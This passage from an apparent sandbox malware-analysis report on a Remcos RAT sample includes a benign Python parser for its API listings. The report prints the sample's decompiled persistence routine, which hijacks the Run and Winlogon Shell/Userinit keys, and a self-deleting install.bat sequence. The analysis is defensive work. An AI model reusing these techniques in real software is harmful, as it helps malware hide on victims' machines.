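The block above is one function of the Remcos payload as the report renders it: every bullet is one API reference with the module it resolved to, the argument values the static pass could recover (literal strings, "?" for unknown, eight hex digits for pointers and constants) and the address of the call, with "Part of subcall function" marking calls that live in a helper. Reading a few hundred of these by hand is slow, so the following Python parser, added here as an illustration and not part of the report or of Joe Sandbox, turns the bullets into records, reduces the MSVC-mangled std::string and ostream symbols to short names so the Win32 calls (IsWow64Process, RegOpenKeyExA, CreateToolhelp32Snapshot, ShellExecuteA) stand out, groups calls by the helper they belong to, and collects the literal strings the analyser recovered ((32 bit), EXEpath, origmsc, the sample path). The sample listing is a dozen lines copied from the block above; the operator map covers only the manglings that occur in this report.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One bullet of a Joe Sandbox "APIs" listing, e.g.
#   • Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,...), ref: 00408E64
#   • CreateThread.KERNEL32 ref: 0040799F
_LINE_RE = re.compile(
    r"^\s*[•*-]?\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}): )?"
    r"(?P<symbol>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_PLACEHOLDER_RE = re.compile(r"^(\?|[0-9A-Fa-f]{8})$")

# Short names for the MSVC operator manglings that occur in this report.
_OPERATORS = {
    "??0": "ctor", "??1": "dtor", "??2": "operator new", "??4": "operator=",
    "??6": "operator<<", "??8": "operator==", "??9": "operator!=",
    "??H": "operator+", "??Y": "operator+=", "??_D": "vbase dtor",
}


@dataclass
class ApiCall:
    symbol: str              # exported name as listed (possibly MSVC-mangled)
    name: str                # readable short form of symbol
    module: str              # DLL the import resolved to
    args: list               # argument values in call order; "?" = unknown
    ref: str                 # address of the call instruction
    subcall: Optional[str]   # address of the helper this call belongs to, if any


def short_name(symbol: str) -> str:
    """Reduce an MSVC-mangled C++ export to its member or operator name;
    plain C exports such as CreateThread or getenv are returned unchanged."""
    if not symbol.startswith("?"):
        return symbol
    for prefix, name in _OPERATORS.items():
        if symbol.startswith(prefix):
            return name
    at = symbol.find("@", 1)            # "?c_str@?$basic_string@..." -> "c_str"
    return symbol[1:at] if at > 1 else symbol


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("symbol"), short_name(m.group("symbol")),
                   m.group("module"), args, m.group("ref").upper(), m.group("subcall"))


def parse_listing(text: str) -> list:
    """Parse every bullet in a listing; lines that are not API bullets are skipped."""
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def win32_calls(calls: list) -> list:
    """Drop the std::string/ostream noise (MSVCP60) and keep OS and CRT calls."""
    return [c for c in calls if c.module != "MSVCP60"]


def literal_args(calls: list) -> list:
    """Unique argument values that are neither '?' nor an 8-digit hex number,
    i.e. the strings the analyser recovered (paths, registry names, config keys)."""
    seen = []
    for c in calls:
        for a in c.args:
            if a and not _PLACEHOLDER_RE.match(a) and a not in seen:
                seen.append(a)
    return seen


def subcall_groups(calls: list) -> dict:
    """Map each helper address ("self" for the function itself) to the short
    names of the calls attributed to it, in listing order."""
    groups = {}
    for c in calls:
        groups.setdefault(c.subcall or "self", []).append(c.name)
    return groups


# A dozen bullets copied from the listing above, used as sample input.
SAMPLE_LISTING = r"""
• Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
• Part of subcall function 0040F0B5: IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
• ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,004108CC,00000000), ref: 004075FC
• ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,004108CC,00000000), ref: 00407865
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,004108CC,00000000), ref: 00407875
• Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00405FB0,80000001,00000000), ref: 00408E64
• Part of subcall function 00407E0B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
• Part of subcall function 00407E0B: Process32First.KERNEL32(?,?), ref: 00407E79
• atoi.MSVCRT ref: 00407970
• CreateThread.KERNEL32 ref: 0040799F
• Part of subcall function 00402A78: ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
• Part of subcall function 00402A78: exit.MSVCRT ref: 00402B3D
"""

if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LISTING)
    for c in win32_calls(calls):
        print(f"{c.ref} {c.subcall or 'self':8} {c.name}.{c.module}({', '.join(c.args)})")
    print("literals:", literal_args(calls))
```

Run it over a whole "APIs" block pasted from the report and the Win32 calls with their string arguments give a compact picture of the function: here the IsWow64Process check feeding a "(32 bit)"/"(64 bit)" string, the registry read of ProductName, the EXEpath value and the Toolhelp32 process walk are what matter, not the hundreds of basic_string calls around them.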

                                          APIs
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00415968,00000000,00415940), ref: 0040652E
                                          • CreateDirectoryA.KERNELBASE(00000000), ref: 00406535
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415918,004108CC,?), ref: 0040654C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 00406559
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?), ref: 00406569
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00406572
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00415968,00000000,00415940), ref: 00406597
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 004065A0
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?), ref: 004065A8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004065E5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040661D
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000000), ref: 00406625
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000,?,?,?,?,004108CC,?), ref: 00406668
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004108CC,?), ref: 00406675
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406680
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406689
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406692
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004066AE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 004066B7
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004066C1
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000000), ref: 004066C9
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004066D6
                                            • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004066E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 0040671F
                                          • SetFileAttributesA.KERNELBASE(00000000), ref: 0040672C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 00406744
                                          • SetFileAttributesA.KERNELBASE(00000000), ref: 0040674B
                                          • getenv.MSVCRT ref: 0040675B
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00406766
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406771
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040677D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406786
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040678F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040679C
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(00000000), ref: 004067A9
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,PING 127.0.0.1 -n 2 ), ref: 004067C1
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,00410860,00410EC8), ref: 004067E7
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(del ,?,00410860,00000000), ref: 004067FB
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406806
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406813
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000), ref: 00406820
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040682D
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 0040683A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406845
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040684E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406857
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406860
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406869
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406872
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410860,?,00410EC8), ref: 00406881
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(start "" ,?,00410860,004157D0,00000000), ref: 0040689A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068A5
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068B2
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004068BF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004068CC
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,00000000,?,00000000), ref: 004068D9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068E4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068ED
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004068FF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406908
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406911
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,del %0 ), ref: 00406923
                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,exit ), ref: 00406931
                                          • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040693C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 0040694F
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 0040695C
                                          • exit.KERNELBASE ref: 00406968
                                          • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00406974
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$V10@$V?$basic_string@$D@2@@0@Hstd@@$?c_str@?$basic_string@$??0?$basic_string@$??6std@@D@1@@D@std@@@0@V?$basic_ostream@$??4?$basic_string@V01@V01@@$File$V10@0@$AttributesCopyD@2@@0@@D@std@@@std@@$?close@?$basic_ofstream@CreateD?$basic_ofstream@DirectoryExecuteShellexitgetenv
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$Ox@$PING 127.0.0.1 -n 2 $Temp$\install.bat$del $del %0 $exit $open$start ""
                                          • API String ID: 979383944-3309268095
                                          • Opcode ID: bac842e0c79e4d9742225db187f362191824e91e391a86a9638ddca735f1309d
                                          • Instruction ID: 3a0a7e291378ef6016657a3b256388cc9313874f64008c8d2928daba6d98e237
                                          • Opcode Fuzzy Hash: bac842e0c79e4d9742225db187f362191824e91e391a86a9638ddca735f1309d
                                          • Instruction Fuzzy Hash: C8D1507190011EEBCB10ABA0EC5DDEE7B7CFB54304B044476F516E2191EEB89A99CB68
                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407177
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004071AE
                                          • getenv.MSVCRT ref: 004071BE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071C9
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004071D4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004071E0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071E9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071F2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071FB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 0040720F
                                          • getenv.MSVCRT ref: 0040721F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040722A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407235
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407241
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407253
                                          • getenv.MSVCRT ref: 00407271
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 0040727C
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104,00000000), ref: 00407292
                                          • GetLongPathNameA.KERNELBASE(00000000), ref: 00407299
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004072AB
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,00000000), ref: 004072BE
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004072D4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072DF
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072EB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072F6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FF
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407308
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407311
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040731A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$??4?$basic_string@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@getenv$?c_str@?$basic_string@LongNamePath
                                          • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                          • API String ID: 3803880367-1609423294
                                          • Opcode ID: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                                          • Instruction ID: 2eda70330f8664ebbc080e427488994969dc3d13a538355b743bf2b4edd7a6ea
                                          • Opcode Fuzzy Hash: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                                          • Instruction Fuzzy Hash: 68518D7290410EEBCB14DBA0EE5EDEE7778EF54305B204176F506A2090DEB86F89CB59
                                          C-Code - Quality: 50%
                                          			E00406339(void* __ecx, char _a4, char _a7, char _a8, char _a12, char _a16, char _a20, intOrPtr _a24) {
                                          				char _v20;
                                          				char _v36;
                                          				char _v52;
                                          				void* _t29;
                                          				void* _t31;
                                          				char* _t32;
                                          				char* _t35;
                                          				char* _t58;
                                          				void* _t59;
                                          				void* _t64;
                                          				void* _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          
                                          				_t58 = "\"";
                                          				if(_a4 == 1) {
                                          					_t75 = _t59 - 0x10;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a24, _t75,  &_v20,  &_v20, _t58, 0x4157d0); // executed
                                          					_t59 = _t75 + 0x38;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          				}
                                          				if(_a8 == 1) {
                                          					_t72 = _t59 - 0x10;
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a24, _t72,  &_v20,  &_v20, _t58, 0x4157d0);
                                          					_t59 = _t72 + 0x38;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          				}
                                          				if(_a12 == 1) {
                                          					_t35 =  &_a7;
                                          					_t68 = _t59 - 0x10;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("explorer.exe, ", _t35, _t58, 0x4157d0, _t58, 1);
                                          					L0040FC20();
                                          					L0040FC14();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "Shell", _t68,  &_v20,  &_v20,  &_v36,  &_v36);
                                          					_t59 = _t68 + 0x44;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t35);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				if(_a16 == 1) {
                                          					_t32 =  &_a7;
                                          					_t64 = _t59 - 0x10;
                                          					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("C:\\WINDOWS\\system32\\userinit.exe, ", _t32, _t58, 0x4157d0, _t58, 1);
                                          					L0040FC20();
                                          					L0040FC14();
                                          					L0040FC20();
                                          					_t29 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "Userinit", _t64,  &_v52,  &_v52,  &_v36,  &_v36);
                                          					_t59 = _t64 + 0x44;
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t32);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				}
                                          				if(_a20 == 1) {
                                          					L0040FC1A();
                                          					L0040FC20();
                                          					_t31 = E00408FDA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a24, _t59 - 0x10,  &_v52,  &_v52, _t58, 0x4157d0);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t58, 1);
                                          					return _t31;
                                          				}
                                          				return _t29;
                                          			}
                                          APIs
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,Ox@), ref: 00406360
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 0040638A
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,004157D0,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004064D8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 004064E2
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,004157D0,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe), ref: 0040636A
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
